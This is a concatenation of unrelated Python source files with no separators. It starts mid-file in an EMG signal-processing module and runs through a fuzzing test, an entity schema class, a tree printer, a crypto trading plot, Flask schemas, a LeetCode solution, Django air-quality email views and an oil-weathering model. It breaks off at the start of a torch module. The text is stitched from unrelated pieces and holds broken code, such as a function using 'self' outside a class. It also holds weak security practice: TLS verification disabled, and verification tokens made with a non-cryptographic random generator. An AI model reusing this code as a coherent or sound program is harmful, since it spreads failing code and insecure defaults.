"Dwugłowy ramienia P", "Prostownik nadgarstka P","Skośny brzucha P", "Pośladkowy średni P","Czworogłowy uda P", "Brzuchaty łydki P"] emg['channel'] = muscles_names return emg def show_emg_data(emg): """ Funkcja do wyświetlania danych EMG. 
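Example (the path is illustrative):

    emg = rename_emg(read_analog_allmuscles('path/to/recording.c3d'))
    show_emg_data(emg)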
Input: - emg - EMG data from the c3d file (Analogs.from_c3d(datapath, usecols=muscles)) Output: - Display of the EMG plots """ emg.plot(x="time", col="channel", col_wrap=3) def normalize_emg(emg): """ Function that normalises the EMG data. Input: - emg - EMG signal traces (Analogs.from_c3d(datapath, usecols=muscles)) Output: - Normalised and filtered EMG data """ emg_p = ( emg.meca.band_pass(order=2, cutoff=[10, 425]) .meca.center() .meca.abs() .meca.low_pass(order=4, cutoff=5, freq=emg.rate) .meca.normalize(ref=None, scale=1) ) return emg_p def emg_full_preproces(datapath): """ Function that loads the EMG data from a c3d file and pre-processes it. Input: - datapath - path to the c3d file Output: - normalised_emg - normalised EMG data """ emg_data = read_analog_allmuscles(datapath) normalised_emg=normalize_emg(emg_data) return normalised_emg def show_events(data_path): """ Function that shows two sets of plots: on the left the movements overlaid in time, on the right the full trace of the muscle activity over time. Input: - data_path - path to the c3d file with the EMG data Output: - Plots of the overlaid movements and of the full muscle activity for the whole recording """ emg_processed = emg_full_preproces(data_path) p,d=read_labels(data_path, 1000) # p - moment the event starts, d - moment the event ends print(p,d) for num in range(16): subplot(1, 2, 1) plt.subplots_adjust(left=0.125, bottom=0.1, right=2.8, top=0.9, wspace=0.25, hspace=0.35) for i in range(len(p)): emg_processed_event=emg_processed[num][p[i]:d[i]] plt.plot(emg_processed_event) subplot(1, 2, 2) plt.plot(emg_processed[num]) plt.show() def compare_events_average(folder_path, person, exer_num): """ Function that displays the averaged muscle activity for a given exercise and actor. 
Input: - folder_path - path to the folder with all the recordings - person - name of the actor to load - exer_num - number of the exercise to load Output: - Plots of the averaged traces for the given exercise """ muscles_names2 = ["Czworoboczny grzbietu L","Trójgłowy ramienia L", "Dwugłowy ramienia L", "Prostownik nadgarstka L","Skośny brzucha L", "Pośladkowy średni L","Czworogłowy uda L", "Brzuchaty łydki L","Czworoboczny grzbietu P","Trójgłowy ramienia P", "Dwugłowy ramienia P", "Prostownik nadgarstka P","Skośny brzucha P", "Pośladkowy średni P","Czworogłowy uda P", "Brzuchaty łydki P"] cons1="\*\*-E0" cons2="-*.c3d" path=folder_path+person+cons1+exer_num+cons2 aver_arr_all=np.zeros((16,1000)) for file in glob.glob(path,recursive = True): print(file) emg_processed=emg_full_preproces(file) aver_arr=np.zeros((16,1000)) file_num=0 p,d=read_labels(file, 1000) for num in range(16): for i in range(len(p)): emg_processed_event=emg_processed[num][p[i]:d[i]] emg_processed_event2 = ( emg_processed_event.meca.normalize(scale=1) ) time_normalized=emg_processed_event2.meca.time_normalize(n_frames=1000) for t in range(1000): aver_arr[num][t]=aver_arr[num][t]+time_normalized.values[t] aver_arr[num]=aver_arr[num]/10 time=np.linspace(1,1000,1000) for t2 in range(1000): aver_arr_all[file_num][t2]=aver_arr_all[file_num][t2]+time_normalized.values[t2] file_num=file_num+1 for num in range(16): subplot(1, 1, 1) plt.subplots_adjust(left=0.125, bottom=0.1, right=2, top=0.7, wspace=0.25, hspace=0.35) aver_arr_all[num]=aver_arr_all[num]/5 plt.plot(time,aver_arr_all[num]) plt.title(muscles_names2[num]) plt.show() print(aver_arr_all) def compare_events_average_shifted(folder_path, person, exer_num): """ Function that displays the averaged muscle activity for a given exercise and actor, with the movements aligned in phase. 
Input: - folder_path - path to the folder with all the recordings - person - name of the actor to load - exer_num - name of the exercise to load Output: - Plots of the averaged traces for the given exercise with the movements aligned in phase """ muscles_names2 = ["Czworoboczny grzbietu L","Trójgłowy ramienia L", "Dwugłowy ramienia L", "Prostownik nadgarstka L","Skośny brzucha L", "Pośladkowy średni L","Czworogłowy uda L", "Brzuchaty łydki L","Czworoboczny grzbietu P","Trójgłowy ramienia P", "Dwugłowy ramienia P", "Prostownik nadgarstka P","Skośny brzucha P", "Pośladkowy średni P","Czworogłowy uda P", "Brzuchaty łydki P"] cons1="\*\*-E0" cons2="-*.c3d" path=folder_path+person+cons1+exer_num+cons2 aver_arr_all=np.zeros((16,1000)) for file in glob.glob(path,recursive = True): print(file) emg_processed=emg_full_preproces(file) aver_arr=np.zeros((16,1000)) file_num=0 p,d=read_labels(file, 1000) ev=[p,d] for num in range(16): s,k=nowy_czas_analog(p,d,emg_processed[num]) for i in range(len(p)): emg_processed_event=emg_processed[num][(p[i]+s[i].astype(int)):(d[i]+k[i].astype(int))] emg_processed_event2 = ( emg_processed_event.meca.normalize(scale=1) ) time_normalized=emg_processed_event2.meca.time_normalize(n_frames=1000) for t in range(1000): aver_arr[num][t]=aver_arr[num][t]+time_normalized.values[t] aver_arr[num]=aver_arr[num]/10 time=np.linspace(1,1000,1000) for t2 in range(1000): aver_arr_all[file_num][t2]=aver_arr_all[file_num][t2]+time_normalized.values[t2] file_num=file_num+1 for num in range(16): subplot(1, 1, 1) plt.subplots_adjust(left=0.125, bottom=0.1, right=2, top=0.7, wspace=0.25, hspace=0.35) aver_arr_all[num]=aver_arr_all[num]/5 plt.plot(time,aver_arr_all[num]) plt.title(muscles_names2[num]) plt.show() # Copyright (c) 2018-2021 , . # # Licensed under the BSD 3-Clause License # . # This file may not be copied, modified, or distributed except # according to those terms. 
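# Minimal usage sketch for the EMG/c3d helpers defined above (not part of the original module):
# it shows how the pieces are meant to be chained -- read_labels() finds the event-based start/end
# frames, emg_full_preproces() loads and filters all 16 EMG channels, and nowy_czas_analog()
# refines the cut points for one muscle. The file path and the 1000 Hz analog rate are assumptions
# for illustration only; replace them with a real recording and its actual sampling rate.
if __name__ == "__main__":
    data_path = "example-recording.c3d"  # hypothetical recording, not shipped with the code
    emg_processed = emg_full_preproces(data_path)   # normalised EMG, one row per muscle
    p, d = read_labels(data_path, 1000)             # event-based start/end frames
    s, k = nowy_czas_analog(p, d, emg_processed[0]) # refined cut points for the first muscle
    print(p, d, s, k)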
import json import os import pytest from functools import partial import fuzzinator from common_reduce import MockFailIfContainsCall, mock_grammars_dir @pytest.mark.parametrize('format, grammar, start, replacements', [ (None, json.dumps([os.path.join(mock_grammars_dir, 'MockGrammar.g4')]), 'text', os.path.join(mock_grammars_dir, 'mock_replacements.json')), (os.path.join(mock_grammars_dir, 'mock_format.json'), None, None, None), ]) @pytest.mark.parametrize('call, call_init_kwargs, issue, exp_test, exp_issues', [ (MockFailIfContainsCall, {'strings': [b'bar\n']}, {'id': b'bar\n', 'test': b'foo\nbar\nbaz\n'}, b'bar\n', []), (MockFailIfContainsCall, {'strings': [b'bar\n', b'ar\n']}, {'id': b'bar\n', 'test': b'foo\nbar\nbaz\n'}, b'bar\n', [{'id': b'ar\n', 'test': b'ar\n'}]), ]) def test_picireny(call, call_init_kwargs, issue, format, grammar, start, replacements, exp_test, exp_issues, tmpdir): reducer = fuzzinator.reduce.Picireny(format=format, grammar=grammar, start=start, replacements=replacements, work_dir=str(tmpdir)) reduced_test, new_issues = reducer(sut_call=call(**call_init_kwargs), issue=issue, on_job_progressed=partial(fuzzinator.listener.EventListener(None).on_job_progressed, job_id=None)) assert reduced_test == exp_test assert new_issues == exp_issues from banal import is_mapping, as_bool from typing import TYPE_CHECKING, Any, List, Optional, TypedDict from followthemoney.exc import InvalidModel from followthemoney.types import registry from followthemoney.rdf import NS, URIRef from followthemoney.util import gettext, get_entity_id if TYPE_CHECKING: from followthemoney.schema import Schema class ReverseSpec(TypedDict, total=False): name: str label: Optional[str] hidden: Optional[bool] class PropertyDict(TypedDict, total=False): label: Optional[str] description: Optional[str] type: Optional[str] hidden: Optional[bool] matchable: Optional[bool] # stub: Optional[bool] rdf: Optional[str] range: Optional[str] class PropertySpec(PropertyDict): reverse: ReverseSpec class PropertyToDict(PropertyDict, total=False): name: str qname: str reverse: Optional[str] stub: Optional[bool] class Property: """A definition of a value-holding field on a schema. Properties define the field type and other possible constraints. They also serve as entity to entity references.""" __slots__ = ( "model", "schema", "name", "qname", "_label", "_hash", "_description", "hidden", "type", "matchable", "_range", "range", "stub", "_reverse", "reverse", "uri", ) #: Invalid property names. RESERVED = ["id", "caption", "schema", "schemata"] def __init__(self, schema: "Schema", name: str, data: PropertySpec) -> None: self.model = schema.model #: The schema which the property is defined for. This is always the #: most abstract schema that has this property, not the possible #: child schemata that inherit it. self.schema = schema #: Machine-readable name for this property. self.name = name #: Qualified property name, which also includes the schema name. self.qname = "%s:%s" % (schema.name, self.name) if self.name in self.RESERVED: raise InvalidModel("Reserved name: %s" % self.name) self._hash = hash("" % self.qname) self._label = data.get("label", name) self._description = data.get("description") #: This property should not be shown or mentioned in the user interface. self.hidden = as_bool(data.get("hidden", False)) type_ = data.get("type", "string") if type_ is None or type_ not in registry.named: raise InvalidModel("Invalid type: %s" % type_) #: The data type for this property. 
self.type = registry[type_] #: Whether this property should be used for matching and cross-referencing. self.matchable = as_bool(data.get("matchable", self.type.matchable)) #: If the property is of type ``entity``, the set of valid schema to be added #: in this property can be constrained. For example, an asset can be owned, #: but a person cannot be owned. self._range = data.get("range") self.range: Optional["Schema"] = None #: When a property points to another schema, a reverse property is added for #: various administrative reasons. These properties are, however, not real #: and cannot be written to. That's why they are marked as stubs and adding #: values to them will raise an exception. self.stub: Optional[bool] = False #: When a property points to another schema, a stub reverse property is #: added as a place to store metadata to help display the link in inverted #: views. self._reverse = data.get("reverse") self.reverse: Optional["Property"] = None #: RDF term for this property (i.e. the predicate URI). self.uri = URIRef(data.get("rdf", NS[self.qname])) def generate(self) -> None: """Setup method used when loading the model in order to build out the reverse links of the property.""" self.model.properties.add(self) if self.type == registry.entity: if self.range is None and self._range is not None: self.range = self.model.get(self._range) if self.reverse is None and self.range and self._reverse: if not is_mapping(self._reverse): raise InvalidModel("Invalid reverse: %s" % self) self.reverse = self.range._add_reverse(self._reverse, self) @property def label(self) -> str: """User-facing title for this property.""" return gettext(self._label) @property def description(self) -> str: """A longer description of the semantics of this property.""" return gettext(self._description) def specificity(self, value: str) -> float: """Return a measure of how precise the given value is.""" if not self.matchable: return 0.0 return self.type.specificity(value) def validate(self, data: List[Any]) -> Optional[str]: """Validate that the data should be stored. Since the types system doesn't really have validation, this currently tries to normalize the value to see if it passes strict parsing. """ values = [] for val in data: if self.stub: return gettext("Property cannot be written") val = get_entity_id(val) if not self.type.validate(val): return gettext("Invalid value") if val is not None: values.append(val) return None def __eq__(self, other: Any) -> bool: return self._hash == hash(other) def __hash__(self) -> int: return self._hash def to_dict(self) -> PropertyToDict: """Return property metadata in a serializable form.""" data: PropertyToDict = { "name": self.name, "qname": self.qname, "label": self.label, "type": self.type.name, } if self.description: data["description"] = self.description if self.stub: data["stub"] = True if self.matchable: data["matchable"] = True if self.hidden: data["hidden"] = True if self.range is not None: data["range"] = self.range.name if self.reverse is not None: data["reverse"] = self.reverse.name return data def __repr__(self) -> str: return "" % self.qname def __str__(self) -> str: return self.qname lutzhamel/ds-assets0 """ treeviz.py A simple tree visualizer for sklearn DecisionTreeClassifiers. Written by , (c) 2017 - Univeristy of Rhode Island """ import operator def tree_print(clf, X): """ Print the tree of a sklearn DecisionTreeClassifier Parameters ---------- clf : DecisionTreeClassifier - A tree that has already been fit. 
X : The original training set """ tlevel = _tree_rprint('', clf, X.columns, clf.classes_) print('<',end='') for i in range(3*tlevel - 2): print('-',end='') print('>') print('Tree Depth: ',tlevel) def _tree_rprint(kword, clf, features, labels, node_index=0, tlevel_index=0): # Note: The DecisionTreeClassifier uses the Tree structure defined in: # github.com/scikit-learn/scikit-learn/blob/master/sklearn/tree/_tree.pyx # it is an array based tree implementation: # indent the nodes according to their tree level for i in range(tlevel_index): print(' |',end='') # TODO: the following should use the TREE_LEAF constant defined in _tree.pyx # instead of -1, not quite sure how to get at it from the tree user level if clf.tree_.children_left[node_index] == -1: # indicates leaf print(kword, end=' ' if kword else '') # get the majority label count_list = clf.tree_.value[node_index, 0] #lhh #print("count list: {}".format(count_list)) if len(count_list) == 1: # regression problem print(count_list[0]) else: # get the majority label max_index, max_value = max(enumerate(count_list), key=operator.itemgetter(1)) max_label = labels[max_index] print(max_label) return tlevel_index else: # compute and print node label feature = features[clf.tree_.feature[node_index]] threshold = clf.tree_.threshold[node_index] print(kword, end=' ' if kword else '') print('if {} =< {}: '.format(feature, threshold)) # recurse down the children left_index = clf.tree_.children_left[node_index] right_index = clf.tree_.children_right[node_index] ltlevel_index = _tree_rprint('then', clf, features, labels, left_index, tlevel_index+1) rtlevel_index = _tree_rprint('else', clf, features, labels, right_index, tlevel_index+1) # return the maximum depth of either one of the children return max(ltlevel_index,rtlevel_index) import os import sys curr_path = os.path.abspath(__file__) root_path = os.path.abspath( os.path.join(curr_path, os.path.pardir, os.path.pardir)) sys.path.append(root_path) from pyjuque.Exchanges.Binance import Binance from pyjuque.Plotting.Plotter import PlotData from pyjuque.Indicators import AddIndicator, HA import pandas as pd import plotly.graph_objs as go def Maine(): exchange = Binance() symbol = 'BTCUSDT' df = exchange.getSymbolKlines(symbol, '1d') AddIndicator(df, 'sma', 'volma', 'volume', 10) signal = df.loc[df['volume'] > 2.4 * df['volma']] s_list = [dict(name='S/R', points=[(row['time'], row['high']) if row['close'] > row['open'] else (row['time'], row['low']) for i, row in signal.iterrows()])] HA(df, ['open', 'high', 'low', 'close']) ha_df = df ha_df['open'] = df['HA_open'] ha_df['high'] = df['HA_high'] ha_df['low'] = df['HA_low'] ha_df['close'] = df['HA_close'] lines = [] last_time = df['time'][len(df)-1] for s in s_list[0]['points']: line = go.layout.Shape( type="line", x0=s[0], y0=s[1], x1=last_time, y1=s[1], ) lines.append(line) PlotData(ha_df, show_plot=True, signals=s_list, plot_shapes=lines, plot_indicators=[dict(name='volma', title="Volume MA", yaxis='y2')]) if __name__ == '__main__': Maine()flask_ecom_api/api/v1/products/schemas.py1-10 from flask_ecom_api import ( # type: ignore Category, Ingredient, Product, ProductImage, ) from flask_ecom_api.app import marshmallow class IngredientSchema(marshmallow.SQLAlchemySchema): """Product ingredient schema.""" class Meta: model = Ingredient ordered = True id = marshmallow.auto_field() name = marshmallow.auto_field() image_src = marshmallow.auto_field() weight = marshmallow.auto_field() price = marshmallow.auto_field() class 
ProductImageSchema(marshmallow.SQLAlchemySchema): """Product image marshmallow schema.""" class Meta: model = ProductImage ordered = True id = marshmallow.auto_field() src = marshmallow.auto_field() product_id = marshmallow.auto_field() is_main = marshmallow.auto_field() class CategorySchema(marshmallow.SQLAlchemySchema): """Product category marshmallow schema.""" class Meta: model = Category ordered = True id = marshmallow.auto_field() name = marshmallow.auto_field() description = marshmallow.auto_field() parent_id = marshmallow.auto_field() class ProductSchema(marshmallow.SQLAlchemySchema): """Product marshmallow schema.""" class Meta: model = Product ordered = True id = marshmallow.auto_field() name = marshmallow.auto_field() description = marshmallow.auto_field() price = marshmallow.auto_field() published = marshmallow.auto_field() ingredients = marshmallow.Nested(IngredientSchema, many=True) images = marshmallow.Nested(ProductImageSchema, many=True) categories = marshmallow.Nested(CategorySchema, many=True) product_schema = ProductSchema() products_schema = ProductSchema(many=True) product_image_schema = ProductImageSchema() # Definition for a binary tree node. # class TreeNode: # def __init__(self, val=0, left=None, right=None): # self.val = val # self.left = left # self.right = right class Solution: def removeLeafNodes(self, root: Optional[TreeNode], target: int) -> Optional[TreeNode]: if root: root.left = self.removeLeafNodes(root.left, target) root.right = self.removeLeafNodes(root.right, target) if root.val != target or root.left or root.right: return rootimport json import random import string from datetime import date, datetime, timedelta from functools import reduce from pathlib import Path import environ import pandas as pd import plotly.express as px import pytz import requests # from django.http import HttpResponse from django.shortcuts import Http404, get_object_or_404, render from django.template.loader import render_to_string from plotly.offline import plot from sendgrid import SendGridAPIClient from sendgrid.helpers.mail import Mail from .models import Subscription # Create your views here. ROOT_DIR = Path(__file__).resolve(strict=True).parent.parent.parent # warmmail/ APPS_DIR = ROOT_DIR / "warmmail" env = environ.Env() env.read_env(str(ROOT_DIR / ".env")) def index(request): """ Base view - the entry page for the website. Renders a page with a search box allowing the user to search for a city or location :param request: The HTTP request :return: Renders the page """ return render(request, "subscribe/index.html") # return HttpResponse("Hello, world. You're at the polls index.") def findplace(request): """ Renders the page showing a list of all the locations. The user is allowed to submit a text name for the location including any significant address details (like city, country, etc.). Using the API exposed from geonames.org => the system renders a list of all the possible locations from which the user may select a location. Selecting a location means selecting a lat/long which is used for the subsequent steps in the journey. 
The function calls the Geonames.org API and requires an environment variable as follows: GEONAMES_API_USERNAME="" :param request: HTTP request, expects a POST request with param: search_term :return: Renders the page """ srch = request.POST["search_term"] response = requests.get( f"http://api.geonames.org/searchJSON?formatted=true&q={srch}&maxRows=10&lang=es&" f"username={env.str('GEONAMES_API_USERNAME')}&style=full" ) if response: items = response.json() places = [] for item in items["geonames"]: city = { "name": item["asciiName"], "country": item["countryCode"], "lat": item["lat"], "long": item["lng"], } places.append(city) return render(request, "subscribe/list_places.html", {"places": places}) else: # redirect to index with error return render(request, "subscribe/list_places.html") aqi_desc = { 50: { "level": "Good", "text": "Air quality is considered satisfactory, and air pollution poses little or no risk.", "class": "text-success", }, 100: { "level": "Moderate", "text": "Air quality is acceptable; however, for some pollutants there may be a moderate health concern " "for a very small number of people who are unusually sensitive to air pollution.", "class": "text-warning", }, 150: { "level": "Unhealthy for Sensitive Groups", "text": "Members of sensitive groups may experience health effects. " "The general public is not likely to be affected.", "class": "text-warning", }, 200: { "level": "Unhealthy", "text": "Everyone may begin to experience health effects; " "members of sensitive groups may experience more serious health effects.", "class": "text-danger", }, 250: { "level": "Very Unhealthy", "text": "Health warnings of emergency conditions. The entire population is more likely to be affected.", "class": "text-danger", }, 300: { "level": "Hazardous", "text": "Health alert: everyone may experience more serious health effects.", "class": "text-danger", }, } def selectplace(request, lat, long): """ Renders the page showing the current AQI stats and historic graphs for the selected location. The page also gives a button to the user to "subscribe" to this report. The function calls the AQICN API and requires an environment variable as follows: AQICN_TOKEN="" :param request: HTTP GET Request :param lat: The selected latitute (passed automatically from findplace) :param long: The selected longiture (passed automatically from findplace) :return: Renders page with the report for the location with a button for user to subscribe. """ # get the real time aqi data for this lat long aqi = f"https://api.waqi.info/feed/geo:{lat};{long}/?token={env.str('AQICN_TOKEN')}" response = requests.get(aqi, verify=False, timeout=2) if response: response = response.json() data = { "aqi": response["data"]["aqi"], "station": response["data"]["city"]["name"], } data["dominentpol"] = ( response["data"]["dominentpol"] if response["data"]["dominentpol"] else "pm25" ) # get aqi description for k, v in aqi_desc.items(): if k > int(data["aqi"]): data["aqi_desc"] = v break # find the name of the city from the station name with open("data/airquality-covid19-cities.json", "r") as f: cities = json.loads(f.read()) # readjust cities to make stations the keys cities = reduce( lambda x, y: {**x, **y}, list( map( lambda x: { k["Name"]: { "city": x["Place"]["name"], "country": x["Place"]["country"], } for k in x["Stations"] }, cities["data"], ) ), ) # our city of focus... 
city = cities[data["station"]] data["city"] = city["city"] # get parquet file df = pd.read_parquet(f"data/AQI_Data-{date.today()}.parquet") df = df[df["City"] == city["city"]].sort_index(ascending=False) df = df[df["Specie"].isin(["pm10", "pm25"])] df = df.pivot(index=None, columns="Specie", values="median") df.fillna(0, inplace=True) df.sort_index(inplace=True, ascending=False) last_7_days = df.iloc[:6] df["month"] = df.index.strftime("%Y-%m") df_month = df.groupby("month").agg("mean") last_7_days_bar = px.bar(last_7_days, title="Last 7 Days", barmode="group") month_bar = px.bar(df_month, title="Monthly", barmode="group") data["last_7_days_bar"] = plot(last_7_days_bar, output_type="div") data["month_bar"] = plot(month_bar, output_type="div") # check that the response return render(request, "subscribe/select_place.html", {"data": data}) def subscribeplace(request, city, dominentpol): """ The last step for the subsription - this view renders a page that allows the user to subscribe to the chosen report. It shows a form to the user which has the following options: * email address - with generic verification * city - auto-populated basis report selected - non editable * time of day - gives option to user to receive report in Morning / Afternoon / Evening * timezone :param request: HTTP GET Request :param city: The name of the city selected for the report - auto-populated by the previous page :param dominentpol: The name of the dominent pollutant in that city - this is a hidden field in the form which is used by the backend report generation :return: Renders the HTML page """ data = { "city": city, "dominentpol": dominentpol, } data["tz"] = pytz.all_timezones return render(request, "subscribe/subscribe_place.html", {"data": data}) time_of_day = { "M": 8, "A": 12, "E": 16, } def confirmsubscription(request): """ A simple page which saves the subscription request and sends out an email verification link The email is sent via Sendgrid and requires an environment variable with the SendGrid API token: SENDGRID_API_KEY="" :param request: HTTP Post request with fields from subscribeplace view :return: Sends out an email using SendGrid """ subscription = Subscription() subscription.email = request.POST["email"] temp_token = "".join(random.choices(string.ascii_letters + string.digits, k=24)) subscription.temp_token = temp_token subscription.city = request.POST["city"] subscription.dominentpol = request.POST["dominentpol"] today = datetime.now(tz=pytz.utc) tz = pytz.timezone(request.POST["timezone"]) loc_time = datetime( today.year, today.month, today.day, time_of_day[request.POST["timeofday"]], 0, 0 ) loc_time = tz.localize(loc_time) utc_time = loc_time.astimezone(pytz.utc) if utc_time <= today: utc_time = utc_time + timedelta(days=1) subscription.next_email_date = utc_time try: subscription.save() except: # noqa: E722 raise Http404("Sorry! 
This request is invalid!") data = {"subscription_id": subscription.pk, "token": temp_token} data["host"] = request.META["HTTP_ORIGIN"] # send an email to verify this html = render_to_string("subscribe/confirm_email_template.html", {"data": data}) message = Mail( from_email="", to_emails=request.POST["email"], subject="Confirm your subscription from WarmMail", html_content=html, ) try: sg = SendGridAPIClient(env.str("SENDGRID_API_KEY")) sg.send(message) except Exception as e: print(e.message) return render(request, "subscribe/confirm_subscription.html", {"data": data}) def verifyemail(request, subscription_id, token): """ The view that users come to after clicking on the email verification link. It verifies the subscription to allow processing from next day. :param request: HTTP Get Request :param subscription_id: Available from the URL :param token: Available from the URL :return: Renders the HTML page """ subscription = get_object_or_404(Subscription, pk=subscription_id) if subscription.temp_token == token: # alles gut! subscription.verified = True subscription.update_date = date.today() subscription.save() data = { "message": f"Great! Your email address has been verified. " f"You will start receiving AQI updates for {subscription.city} in 24 hours!", } return render(request, "subscribe/email_confirmed.html", {"data": data}) elif subscription.verified: data = { "message": "This subscription is already verified!", } return render(request, "subscribe/email_confirmed.html", {"data": data}) else: raise Http404("Sorry! This request is invalid!") # -*- coding: utf-8 -*- """ Created on Thu Mar 18 13:20:25 2021 @author: """ import math import numpy as np import evaporation as ev import weathering_utils as wu def interp(val, array_value, array_ref): """ Interpolate the array_value from the array_ref with val. The array_ref must be in an increasing order! """ if val <= array_ref[0]: return array_value[0] elif val > array_ref[len(array_ref)-1]: return array_value[len(array_ref)-1] else: i = 1 while val > array_ref[i]: i += 1 delta = array_ref[i] - array_ref[i-1] return ((array_ref[i]-val)*array_value[i-1]+array_value[i]*(val-array_ref[i-1]))/delta class mix: def __init__(self, name): self.name = name self.list_component = [] self.density = [] #density values depending on the temperature self.density_T = [] #temperature of the density values given above self.viscosity = [] #density values depending on the temperature self.viscosity_T = [] #temperature of the density values given above self.K_em = None self.max_water = 0.8 # max amount of water in the emulsion def generate_component_cut(self, temp, fraction, tot_amount): """ Generate the components for oils, two vectors (one with temperatures and one with cumulative amount evaporated). The total amount (m³) must be given and the temperature at which the fraction does not evaporated anymore too (in °C). 
It compute some basic properties for the components Parameters ---------- temp : Temperature vector fraction : Fraction vector tot_amount : Amount of the mix [m³] Raises ------ Exception Raise an exception if the two vectors does not have the same size """ if len(temp) != len(fraction): raise Exception("The two vectors must have the same size") #Temperature is given in °C prev = 0 remaining = 100 for i in range(len(temp)): if temp[i] > wu.MAX_EVAPORATIVE_TEMP-273.15: break ratio = fraction[i] - prev prev = fraction[i] compound = component(temp[i], tot_amount * ratio/100) compound.boiling_T = temp[i] + 273.15 self.list_component.append(compound) remaining -= ratio #add non volatils compounds if not = 100% if remaining > 0: compound = component("Heavy (1000)", tot_amount * remaining/100) compound.boiling_T = 1000 self.list_component.append(compound) self.add_oil_properties() def add_Fingas(self, c1, c2 = None): """ Add the fingas constant c1 and c2 to the mix """ self.fingas1 = c1 self.fingas2 = c2 def add_component(self, compound): """ Add a component to the mix Parameters ---------- compound : Component to add """ self.list_component.append(compound) def is_pure(self): """ Return True if the mix is only composed of 0 or one component, else return False. """ return len(self.list_component) <= 1 def get_comp(self, index): """ Return the component at the position 'index' in the mix """ return self.list_component[index] def get_prop(self, T): """ Return the properties of the mix. If the mix is empty, return an exception. If it contains only one component, it returns it. If it contains more, it returns a combinaison of the properties Parameters ---------- T: temperature [K] """ if len(self.list_component) <= 0: raise Exception("This mixture has no component!") elif len(self.list_component) == 1: return self.list_component[0] else: #combine the components tot_amount = 0 molar_sum = 0 mass_sum = 0 for comp in self.list_component: tot_amount += comp.amount molar_sum += comp.amount / comp.molar_volume if comp.density is not None: mass_sum += comp.amount*comp.density else: mass_sum = None partial_P = 0 self.ref_T_Clau = self.list_component[0].ref_T_Clau for comp in self.list_component: if comp.partial_P is not None: partial_P += comp.get_partial_P(T) * comp.amount / comp.molar_volume else: partial_P += 0 if partial_P is not None and tot_amount != 0: partial_P = partial_P / molar_sum else: partial_P = None #1: computing the density from the components density = 0 for comp in self.list_component: if comp.get_density(T) is not None and comp.amount > 0: density += comp.amount * comp.get_density(T) / tot_amount #2: if not from components, take the defaut if density == 0: if len(self.density) > 0: density = self.get_density(T) elif mass_sum is not None and tot_amount != 0: density = mass_sum/tot_amount else: density = None bulk = component('bulk', tot_amount) bulk.density = density if tot_amount != 0: bulk.molar_weight = (tot_amount*density)/ molar_sum bulk.molar_volume = tot_amount /molar_sum else: bulk.molar_weight = None bulk.molar_volume = None bulk.partial_P = partial_P return bulk def get_molar_fract(self, tg_comp): """ Get the molar fraction of the component tg_comp """ if len(self.list_component) <= 0: raise Exception("This oil has no component!") molar_sum = 0 for comp in self.list_component: molar_sum += comp.amount / comp.molar_volume fract = (tg_comp.amount / tg_comp.molar_volume) /molar_sum return fract def add_amount(self, add_amount): """ This function add/remove for each component at the 
same time and return an array with the quantities added to each component """ tot_amount = 0 array_tr = np.zeros((len(self.list_component))) for comp in self.list_component: tot_amount += comp.amount for i in range(0, len(self.list_component)): amount = add_amount * (self.list_component[i].amount/tot_amount) self.list_component[i].amount += amount array_tr[i] = amount return array_tr def get_density(self, T): """ Return the density[kg/m³] interpolated at the value T [K] """ return interp(T, self.density, self.density_T) def get_viscosity(self, T): """ Return the viscosity[Pa s] interpolated at the value T [K] """ return interp(T, self.viscosity, self.viscosity_T) def get_array_amount(self): """ Return an array with the amount of each component [m³] """ array_tr = np.zeros((len(self.list_component))) for i in range(0,len(self.list_component)): array_tr[i] = self.get_comp(i).amount return array_tr def add_oil_properties(self): """ Compute the boiling temperature, molar volume and molar weigth of components """ for component in self.list_component: if component.boiling_T is None and component.density is not None: component.boiling_T = ev.boiling_T_rho(component.density) elif component.boiling_T is not None and component.density is None: component.density = ev.rho_from_boiling_T(component.boiling_T) if component.molar_volume is None: component.molar_volume = ev.molar_volume_eb_T(component.boiling_T) if component.density is not None and component.molar_weight is None: component.molar_weight = component.density * component.molar_volume def get_mix_viscosity(mix, array_in_emulsion): """ Return the viscosity of the mix, array_in_emulsion is an array with the amount of each component in emulsion """ #if there is less than 1% of emulsion, we make the log sum of viscosity #TODO pass def get_emulsion_density(mix, T, array_in_emulsion, water_density = 1020): """ Return the density by taking into account each component, T is the temperature, array_in_emulsion is an array with the amount of each component in emulsion """ water_volume = 0 oil_volume = 0 oil_mass = 0 for i in range(0, len(mix.list_component)): component_density = mix.list_component[i].get_density(T) if component_density is None : return None oil_volume += (mix.list_component[i].amount+array_in_emulsion[i]) oil_mass += (mix.list_component[i].amount+array_in_emulsion[i]) * component_density water_volume += array_in_emulsion[i] *(mix.max_water/(1-self.max_water)) return (oil_mass+water_volume*1020)/(oil_volume+water_volume) class component: ref_T_Clau = None #[K] : ref temp for the vap_enthalpie and partial_P molar_weight = None #[kg/mol] density = None #[kg/m³] boiling_T = None #[K] partial_P = None #[Pa] molar_volume = None #[m³/mol] vap_enthalpie = None #[J/kg] h_l_phot = None #[1/s] h_l_biod = None #[1/s] solubility = None #[kg/m³] def __init__(self, name, amount = 0): self.name = name self.amount = amount #[m³] def get_density(self, T=0): """ Return the density [kg/m³] of the component. 
The temperature T [K]can be given for taking into account the density change with the temperature """ #TODO : change in density with the temperature return self.density def get_partial_P(self, T): """ Return the partial pressure [Pa] of the component at the temperature T [K] """ if self.vap_enthalpie is not None and self.ref_T_Clau is not None: a = (1/self.ref_T_Clau)-(1/T) return self.partial_P * math.exp((self.vap_enthalpie * self.molar_weight/8.314) * a) else: return self.partial_P def compute_enthalpy(self): """ Return an estimation of the vap_enthalpie from a vapor pressure at a certain temperature an the ebulition temperature. It suppose the vap_enthalpie independant of the temperature """ if self.molar_weight is None: raise Exception("The molar_weight must be defined for this") if self.boiling_T is None: raise Exception("The boiling_T must be defined for this") if self.ref_T_Clau is None: raise Exception("The ref_T_Clau must be defined for this") num = - 8.314 *math.log(self.boiling_T/self.partial_P) den = self.molar_weight* (1/self.boiling_T-1/self.ref_T_Clau) self.vap_enthalpie = num/den def compute_molar_volume(self): """ Compute the molar volume from the molar weight and density """ self.molar_volume = self.molar_weight/self.density def to_half_life(days): """ Return the constant [1/s] from the half life length [day] """ s= days * 3600*24 return -math.log(1/2)/s import torch from torch.utils.data import Dataset, DataLoader import torchvision.transforms as transforms import scipy.stats from scipy import ndimage import numpy as np import matplotlib.pyplot as plt from PIL import Image, ImageDraw, ImageFilter import io import random from pathlib import Path import os import shutil pil_to_tensor = transforms.Compose( [transforms.PILToTensor(), transforms.ConvertImageDtype(torch.float) ]) def show_img(image, **kwargs): plt.figure() plt.axis('off') plt.imshow(image, cmap="Greys", **kwargs) def y_sinusoid(size=(256,256), frequency=4, phase_shift=0): 